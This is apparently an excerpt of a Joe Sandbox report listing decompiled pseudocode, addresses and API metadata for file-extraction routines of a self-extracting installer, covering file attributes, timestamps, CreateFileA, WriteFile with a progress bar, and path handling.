                                                                                                                                                                                                                                              						__eflags = _t50;
                                                                                                                                                                                                                                              						if(_t50 != 0) {
                                                                                                                                                                                                                                              							_t51 = _t50 & 0x00000027;
                                                                                                                                                                                                                                              							__eflags = _t51;
                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                              							_t51 = 0x80;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t30 = SetFileAttributesA( &_v268, _t51); // executed
                                                                                                                                                                                                                                              						__eflags = _t30;
                                                                                                                                                                                                                                              						if(_t30 == 0) {
                                                                                                                                                                                                                                              							goto L3;
                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                              							_t33 = 1;
                                                                                                                                                                                                                                              							goto L35;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					_t30 = _t44 - 1;
                                                                                                                                                                                                                                              					__eflags = _t30;
                                                                                                                                                                                                                                              					if(_t30 == 0) {
                                                                                                                                                                                                                                              						goto L3;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					goto L9;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				if(_a4 == 3) {
                                                                                                                                                                                                                                              					_t30 = E00A84B60( *((intOrPtr*)(_t75 + 0x14)));
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				goto L3;
                                                                                                                                                                                                                                              			}































                                                                                                                                                                                                                                              0x00a84cd0
                                                                                                                                                                                                                                              0x00a84cdb
                                                                                                                                                                                                                                              0x00a84ce0
                                                                                                                                                                                                                                              0x00a84ce2
                                                                                                                                                                                                                                              0x00a84cee
                                                                                                                                                                                                                                              0x00a84cf2
                                                                                                                                                                                                                                              0x00a84d0e
                                                                                                                                                                                                                                              0x00a84d0e
                                                                                                                                                                                                                                              0x00a84d11
                                                                                                                                                                                                                                              0x00a84e83
                                                                                                                                                                                                                                              0x00a84e88
                                                                                                                                                                                                                                              0x00a84e98
                                                                                                                                                                                                                                              0x00a84e98
                                                                                                                                                                                                                                              0x00a84d17
                                                                                                                                                                                                                                              0x00a84d17
                                                                                                                                                                                                                                              0x00a84d1a
                                                                                                                                                                                                                                              0x00a84d2f
                                                                                                                                                                                                                                              0x00a84d2f
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a84d2f
                                                                                                                                                                                                                                              0x00a84d1c
                                                                                                                                                                                                                                              0x00a84d1c
                                                                                                                                                                                                                                              0x00a84d1f
                                                                                                                                                                                                                                              0x00a84dcb
                                                                                                                                                                                                                                              0x00a84dd0
                                                                                                                                                                                                                                              0x00a84dd2
                                                                                                                                                                                                                                              0x00a84ddd
                                                                                                                                                                                                                                              0x00a84ddd
                                                                                                                                                                                                                                              0x00a84de3
                                                                                                                                                                                                                                              0x00a84de8
                                                                                                                                                                                                                                              0x00a84ded
                                                                                                                                                                                                                                              0x00a84ded
                                                                                                                                                                                                                                              0x00a84def
                                                                                                                                                                                                                                              0x00a84df0
                                                                                                                                                                                                                                              0x00a84df0
                                                                                                                                                                                                                                              0x00a84df4
                                                                                                                                                                                                                                              0x00a84df4
                                                                                                                                                                                                                                              0x00a84df6
                                                                                                                                                                                                                                              0x00a84df9
                                                                                                                                                                                                                                              0x00a84dfc
                                                                                                                                                                                                                                              0x00a84dfc
                                                                                                                                                                                                                                              0x00a84dfe
                                                                                                                                                                                                                                              0x00a84dff
                                                                                                                                                                                                                                              0x00a84dff
                                                                                                                                                                                                                                              0x00a84e03
                                                                                                                                                                                                                                              0x00a84e08
                                                                                                                                                                                                                                              0x00a84e0a
                                                                                                                                                                                                                                              0x00a84e0f
                                                                                                                                                                                                                                              0x00a84d03
                                                                                                                                                                                                                                              0x00a84d03
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a84d03
                                                                                                                                                                                                                                              0x00a84e18
                                                                                                                                                                                                                                              0x00a84e20
                                                                                                                                                                                                                                              0x00a84e25
                                                                                                                                                                                                                                              0x00a84e27
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a84e33
                                                                                                                                                                                                                                              0x00a84e38
                                                                                                                                                                                                                                              0x00a84e3a
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a84e40
                                                                                                                                                                                                                                              0x00a84e51
                                                                                                                                                                                                                                              0x00a84e56
                                                                                                                                                                                                                                              0x00a84e5b
                                                                                                                                                                                                                                              0x00a84e5e
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a84e6a
                                                                                                                                                                                                                                              0x00a84e6f
                                                                                                                                                                                                                                              0x00a84e71
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a84e77
                                                                                                                                                                                                                                              0x00a84e7d
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a84e7d
                                                                                                                                                                                                                                              0x00a84d25
                                                                                                                                                                                                                                              0x00a84d25
                                                                                                                                                                                                                                              0x00a84d28
                                                                                                                                                                                                                                              0x00a84d36
                                                                                                                                                                                                                                              0x00a84d3b
                                                                                                                                                                                                                                              0x00a84d40
                                                                                                                                                                                                                                              0x00a84d40
                                                                                                                                                                                                                                              0x00a84d42
                                                                                                                                                                                                                                              0x00a84d43
                                                                                                                                                                                                                                              0x00a84d43
                                                                                                                                                                                                                                              0x00a84d47
                                                                                                                                                                                                                                              0x00a84d4a
                                                                                                                                                                                                                                              0x00a84d4a
                                                                                                                                                                                                                                              0x00a84d4c
                                                                                                                                                                                                                                              0x00a84d4f
                                                                                                                                                                                                                                              0x00a84d4f
                                                                                                                                                                                                                                              0x00a84d51
                                                                                                                                                                                                                                              0x00a84d52
                                                                                                                                                                                                                                              0x00a84d52
                                                                                                                                                                                                                                              0x00a84d56
                                                                                                                                                                                                                                              0x00a84d5b
                                                                                                                                                                                                                                              0x00a84d5d
                                                                                                                                                                                                                                              0x00a84d62
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a84d67
                                                                                                                                                                                                                                              0x00a84d6f
                                                                                                                                                                                                                                              0x00a84d74
                                                                                                                                                                                                                                              0x00a84d76
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a84d7c
                                                                                                                                                                                                                                              0x00a84d84
                                                                                                                                                                                                                                              0x00a84d89
                                                                                                                                                                                                                                              0x00a84d8b
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a84d94
                                                                                                                                                                                                                                              0x00a84d99
                                                                                                                                                                                                                                              0x00a84d9e
                                                                                                                                                                                                                                              0x00a84da1
                                                                                                                                                                                                                                              0x00a84daa
                                                                                                                                                                                                                                              0x00a84daa
                                                                                                                                                                                                                                              0x00a84da3
                                                                                                                                                                                                                                              0x00a84da3
                                                                                                                                                                                                                                              0x00a84da3
                                                                                                                                                                                                                                              0x00a84db5
                                                                                                                                                                                                                                              0x00a84dbb
                                                                                                                                                                                                                                              0x00a84dbd
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a84dc3
                                                                                                                                                                                                                                              0x00a84dc5
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a84dc5
                                                                                                                                                                                                                                              0x00a84dbd
                                                                                                                                                                                                                                              0x00a84d2a
                                                                                                                                                                                                                                              0x00a84d2a
                                                                                                                                                                                                                                              0x00a84d2d
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a84d2d
                                                                                                                                                                                                                                              0x00a84cf8
                                                                                                                                                                                                                                              0x00a84cfd
                                                                                                                                                                                                                                              0x00a84d02
                                                                                                                                                                                                                                              0x00000000

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • SetFileAttributesA.KERNELBASE(?,?,?,?), ref: 00A84DB5
                                                                                                                                                                                                                                              • SetDlgItemTextA.USER32(00000000,00000837,?), ref: 00A84DDD
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.406290316.0000000000A81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406258413.0000000000A80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406326237.0000000000A88000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_a80000_fDI32WO.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: AttributesFileItemText
                                                                                                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\
                                                                                                                                                                                                                                              • API String ID: 3625706803-1610346413
                                                                                                                                                                                                                                              • Opcode ID: 3b606c3a7da5400857a81bd5af9c6fc243fb562a3936465cb1478895bf9195f0
                                                                                                                                                                                                                                              • Instruction ID: e6c28b35d744b6bfbc4402943e56f846e0c688139dc26bff7a8c5edb1f30131d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3b606c3a7da5400857a81bd5af9c6fc243fb562a3936465cb1478895bf9195f0
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2A4104366042039BCB25BF38DE486FA7BA5EB4D300F084669E88697285DA31DE4AC750
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                                                              			E00A84C37(signed int __ecx, int __edx, int _a4) {
                                                                                                                                                                                                                                              				struct _FILETIME _v12;
                                                                                                                                                                                                                                              				struct _FILETIME _v20;
                                                                                                                                                                                                                                              				FILETIME* _t14;
                                                                                                                                                                                                                                              				int _t15;
                                                                                                                                                                                                                                              				signed int _t21;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t21 = __ecx * 0x18;
                                                                                                                                                                                                                                              				if( *((intOrPtr*)(_t21 + 0xa88d64)) == 1 || DosDateTimeToFileTime(__edx, _a4,  &_v20) == 0 || LocalFileTimeToFileTime( &_v20,  &_v12) == 0) {
                                                                                                                                                                                                                                              					L5:
                                                                                                                                                                                                                                              					return 0;
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					_t14 =  &_v12;
                                                                                                                                                                                                                                              					_t15 = SetFileTime( *(_t21 + 0xa88d74), _t14, _t14, _t14); // executed
                                                                                                                                                                                                                                              					if(_t15 == 0) {
                                                                                                                                                                                                                                              						goto L5;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					return 1;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              			}








                                                                                                                                                                                                                                              0x00a84c40
                                                                                                                                                                                                                                              0x00a84c4a
                                                                                                                                                                                                                                              0x00a84c8d
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a84c70
                                                                                                                                                                                                                                              0x00a84c70
                                                                                                                                                                                                                                              0x00a84c7e
                                                                                                                                                                                                                                              0x00a84c86
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a84c8a

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 00A84C54
                                                                                                                                                                                                                                              • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00A84C66
                                                                                                                                                                                                                                              • SetFileTime.KERNELBASE(?,?,?,?), ref: 00A84C7E
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.406290316.0000000000A81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406258413.0000000000A80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406326237.0000000000A88000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_a80000_fDI32WO.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Time$File$DateLocal
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2071732420-0
                                                                                                                                                                                                                                              • Opcode ID: ece9ce1568510251e64da92922cf7db1c9e4fe31d662afa37dd77e7c10d8dd6b
                                                                                                                                                                                                                                              • Instruction ID: efb57c119644059dfafe509bc36b3cf3149c42a4b7dd71f39c10c44279835c03
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ece9ce1568510251e64da92922cf7db1c9e4fe31d662afa37dd77e7c10d8dd6b
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2BF030B260120EAFAB64EFB5CC49DBB7BBDEB18240B44462BB915C1051EA34D924D7A1
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 75%
                                                                                                                                                                                                                                              			E00A8487A(CHAR* __ecx, signed int __edx) {
                                                                                                                                                                                                                                              				void* _t7;
                                                                                                                                                                                                                                              				CHAR* _t11;
                                                                                                                                                                                                                                              				long _t18;
                                                                                                                                                                                                                                              				long _t23;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t11 = __ecx;
                                                                                                                                                                                                                                              				asm("sbb edi, edi");
                                                                                                                                                                                                                                              				_t18 = ( ~(__edx & 3) & 0xc0000000) + 0x80000000;
                                                                                                                                                                                                                                              				if((__edx & 0x00000100) == 0) {
                                                                                                                                                                                                                                              					asm("sbb esi, esi");
                                                                                                                                                                                                                                              					_t23 = ( ~(__edx & 0x00000200) & 0x00000002) + 3;
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					if((__edx & 0x00000400) == 0) {
                                                                                                                                                                                                                                              						asm("sbb esi, esi");
                                                                                                                                                                                                                                              						_t23 = ( ~(__edx & 0x00000200) & 0xfffffffe) + 4;
                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                              						_t23 = 1;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t7 = CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0); // executed
                                                                                                                                                                                                                                              				if(_t7 != 0xffffffff || _t23 == 3) {
                                                                                                                                                                                                                                              					return _t7;
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					E00A8490C(_t11);
                                                                                                                                                                                                                                              					return CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0);
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              			}







                                                                                                                                                                                                                                              0x00a84880
                                                                                                                                                                                                                                              0x00a8488c
                                                                                                                                                                                                                                              0x00a84894
                                                                                                                                                                                                                                              0x00a848a0
                                                                                                                                                                                                                                              0x00a848c9
                                                                                                                                                                                                                                              0x00a848ce
                                                                                                                                                                                                                                              0x00a848a2
                                                                                                                                                                                                                                              0x00a848a8
                                                                                                                                                                                                                                              0x00a848b7
                                                                                                                                                                                                                                              0x00a848bc
                                                                                                                                                                                                                                              0x00a848aa
                                                                                                                                                                                                                                              0x00a848ac
                                                                                                                                                                                                                                              0x00a848ac
                                                                                                                                                                                                                                              0x00a848a8
                                                                                                                                                                                                                                              0x00a848de
                                                                                                                                                                                                                                              0x00a848e7
                                                                                                                                                                                                                                              0x00a8490b
                                                                                                                                                                                                                                              0x00a848ee
                                                                                                                                                                                                                                              0x00a848f0
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a84902

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • CreateFileA.KERNELBASE(00008000,-80000000,00000000,00000000,?,00000080,00000000,00000000,00000000,00000000,00A84A23,?,00A84F67,*MEMCAB,00008000,00000180), ref: 00A848DE
                                                                                                                                                                                                                                              • CreateFileA.KERNEL32(00008000,-80000000,00000000,00000000,?,00000080,00000000,?,00A84F67,*MEMCAB,00008000,00000180), ref: 00A84902
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.406290316.0000000000A81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406258413.0000000000A80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406326237.0000000000A88000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_a80000_fDI32WO.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CreateFile
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 823142352-0
                                                                                                                                                                                                                                              • Opcode ID: 3e67c60750f0695c16f90ae4a8b9ce5671bc0b144ff9b851d4c99d07747eb452
                                                                                                                                                                                                                                              • Instruction ID: 191fba3171d170a4a7a6e17fb7e9f05ad8426fe622143ea56cf899114e6a13fb
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3e67c60750f0695c16f90ae4a8b9ce5671bc0b144ff9b851d4c99d07747eb452
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 29014BA3E1157126F324A1694C88FB7595CCB9A734F1B0335FDAAE71D1D5644C0483E0
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 93%
                                                                                                                                                                                                                                              			E00A84AD0(signed int _a4, void* _a8, long _a12) {
                                                                                                                                                                                                                                              				signed int _t9;
                                                                                                                                                                                                                                              				int _t12;
                                                                                                                                                                                                                                              				signed int _t14;
                                                                                                                                                                                                                                              				signed int _t15;
                                                                                                                                                                                                                                              				void* _t20;
                                                                                                                                                                                                                                              				struct HWND__* _t21;
                                                                                                                                                                                                                                              				signed int _t24;
                                                                                                                                                                                                                                              				signed int _t25;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t20 =  *0xa8858c; // 0x268
                                                                                                                                                                                                                                              				_t9 = E00A83680(_t20);
                                                                                                                                                                                                                                              				if( *0xa891d8 == 0) {
                                                                                                                                                                                                                                              					_push(_t24);
                                                                                                                                                                                                                                              					_t12 = WriteFile( *(0xa88d74 + _a4 * 0x18), _a8, _a12,  &_a12, 0); // executed
                                                                                                                                                                                                                                              					if(_t12 != 0) {
                                                                                                                                                                                                                                              						_t25 = _a12;
                                                                                                                                                                                                                                              						if(_t25 != 0xffffffff) {
                                                                                                                                                                                                                                              							_t14 =  *0xa89400; // 0x2e800
                                                                                                                                                                                                                                              							_t15 = _t14 + _t25;
                                                                                                                                                                                                                                              							 *0xa89400 = _t15;
                                                                                                                                                                                                                                              							if( *0xa88184 != 0) {
                                                                                                                                                                                                                                              								_t21 =  *0xa88584; // 0x0
                                                                                                                                                                                                                                              								if(_t21 != 0) {
                                                                                                                                                                                                                                              									SendDlgItemMessageA(_t21, 0x83a, 0x402, _t15 * 0x64 /  *0xa893f8, 0);
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                              						_t25 = _t24 | 0xffffffff;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					return _t25;
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					return _t9 | 0xffffffff;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              			}











                                                                                                                                                                                                                                              0x00a84ad5
                                                                                                                                                                                                                                              0x00a84adb
                                                                                                                                                                                                                                              0x00a84ae7
                                                                                                                                                                                                                                              0x00a84aee
                                                                                                                                                                                                                                              0x00a84b05
                                                                                                                                                                                                                                              0x00a84b0d
                                                                                                                                                                                                                                              0x00a84b14
                                                                                                                                                                                                                                              0x00a84b1a
                                                                                                                                                                                                                                              0x00a84b1c
                                                                                                                                                                                                                                              0x00a84b21
                                                                                                                                                                                                                                              0x00a84b2a
                                                                                                                                                                                                                                              0x00a84b2f
                                                                                                                                                                                                                                              0x00a84b31
                                                                                                                                                                                                                                              0x00a84b39
                                                                                                                                                                                                                                              0x00a84b54
                                                                                                                                                                                                                                              0x00a84b54
                                                                                                                                                                                                                                              0x00a84b39
                                                                                                                                                                                                                                              0x00a84b2f
                                                                                                                                                                                                                                              0x00a84b0f
                                                                                                                                                                                                                                              0x00a84b0f
                                                                                                                                                                                                                                              0x00a84b0f
                                                                                                                                                                                                                                              0x00a84b5e
                                                                                                                                                                                                                                              0x00a84ae9
                                                                                                                                                                                                                                              0x00a84aed
                                                                                                                                                                                                                                              0x00a84aed

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00A83680: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 00A8369F
                                                                                                                                                                                                                                                • Part of subcall function 00A83680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00A836B2
                                                                                                                                                                                                                                                • Part of subcall function 00A83680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00A836DA
                                                                                                                                                                                                                                              • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 00A84B05
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.406290316.0000000000A81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406258413.0000000000A80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406326237.0000000000A88000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_a80000_fDI32WO.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: MessagePeek$FileMultipleObjectsWaitWrite
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1084409-0
                                                                                                                                                                                                                                              • Opcode ID: 2fcd898ab06e94409357b31da27db38108e4dec4a520ecb9fe3a31ea1ee258ae
                                                                                                                                                                                                                                              • Instruction ID: 2cc1b3f6e3881713e8b8e98b154fdc5ed1c32ab13707ad9b70ebfe47c31cf415
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2fcd898ab06e94409357b31da27db38108e4dec4a520ecb9fe3a31ea1ee258ae
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EB019231640302ABDB14EF98DC09BA37769F748725F098225F9399B1F1CB70D812CB50
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                                                              			E00A8658A(char* __ecx, void* __edx, char* _a4) {
                                                                                                                                                                                                                                              				intOrPtr _t4;
                                                                                                                                                                                                                                              				char* _t6;
                                                                                                                                                                                                                                              				char* _t8;
                                                                                                                                                                                                                                              				void* _t10;
                                                                                                                                                                                                                                              				void* _t12;
                                                                                                                                                                                                                                              				char* _t16;
                                                                                                                                                                                                                                              				intOrPtr* _t17;
                                                                                                                                                                                                                                              				void* _t18;
                                                                                                                                                                                                                                              				char* _t19;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t16 = __ecx;
                                                                                                                                                                                                                                              				_t10 = __edx;
                                                                                                                                                                                                                                              				_t17 = __ecx;
                                                                                                                                                                                                                                              				_t1 = _t17 + 1; // 0xa88b3f
                                                                                                                                                                                                                                              				_t12 = _t1;
                                                                                                                                                                                                                                              				do {
                                                                                                                                                                                                                                              					_t4 =  *_t17;
                                                                                                                                                                                                                                              					_t17 = _t17 + 1;
                                                                                                                                                                                                                                              				} while (_t4 != 0);
                                                                                                                                                                                                                                              				_t18 = _t17 - _t12;
                                                                                                                                                                                                                                              				_t2 = _t18 + 1; // 0xa88b40
                                                                                                                                                                                                                                              				if(_t2 < __edx) {
                                                                                                                                                                                                                                              					_t19 = _t18 + __ecx;
                                                                                                                                                                                                                                              					if(_t19 > __ecx) {
                                                                                                                                                                                                                                              						_t8 = CharPrevA(__ecx, _t19); // executed
                                                                                                                                                                                                                                              						if( *_t8 != 0x5c) {
                                                                                                                                                                                                                                              							 *_t19 = 0x5c;
                                                                                                                                                                                                                                              							_t19 =  &(_t19[1]);
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					_t6 = _a4;
                                                                                                                                                                                                                                              					 *_t19 = 0;
                                                                                                                                                                                                                                              					while( *_t6 == 0x20) {
                                                                                                                                                                                                                                              						_t6 = _t6 + 1;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					return E00A816B3(_t16, _t10, _t6);
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return 0x8007007a;
                                                                                                                                                                                                                                              			}












                                                                                                                                                                                                                                              0x00a86592
                                                                                                                                                                                                                                              0x00a86594
                                                                                                                                                                                                                                              0x00a86596
                                                                                                                                                                                                                                              0x00a86598
                                                                                                                                                                                                                                              0x00a86598
                                                                                                                                                                                                                                              0x00a8659b
                                                                                                                                                                                                                                              0x00a8659b
                                                                                                                                                                                                                                              0x00a8659d
                                                                                                                                                                                                                                              0x00a8659e
                                                                                                                                                                                                                                              0x00a865a2
                                                                                                                                                                                                                                              0x00a865a4
                                                                                                                                                                                                                                              0x00a865a9
                                                                                                                                                                                                                                              0x00a865b2
                                                                                                                                                                                                                                              0x00a865b6
                                                                                                                                                                                                                                              0x00a865ba
                                                                                                                                                                                                                                              0x00a865c3
                                                                                                                                                                                                                                              0x00a865c5
                                                                                                                                                                                                                                              0x00a865c8
                                                                                                                                                                                                                                              0x00a865c8
                                                                                                                                                                                                                                              0x00a865c3
                                                                                                                                                                                                                                              0x00a865c9
                                                                                                                                                                                                                                              0x00a865cc
                                                                                                                                                                                                                                              0x00a865d2
                                                                                                                                                                                                                                              0x00a865d1
                                                                                                                                                                                                                                              0x00a865d1
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a865dc
                                                                                                                                                                                                                                              0x00000000

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • CharPrevA.USER32(00A88B3E,00A88B3F,00000001,00A88B3E,-00000003,?,00A860EC,00A81140,?), ref: 00A865BA
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.406290316.0000000000A81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406258413.0000000000A80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406326237.0000000000A88000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_a80000_fDI32WO.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CharPrev
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 122130370-0
                                                                                                                                                                                                                                              • Opcode ID: b9e9bfbc1d2ea8449797dbd23ad9d83eff2508bfd02e07a399e10b0315d944d6
                                                                                                                                                                                                                                              • Instruction ID: 2e57dd47ae8dda3434567f0ab819ef2ac9a769a7b3449aa008e292c229c0fad6
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b9e9bfbc1d2ea8449797dbd23ad9d83eff2508bfd02e07a399e10b0315d944d6
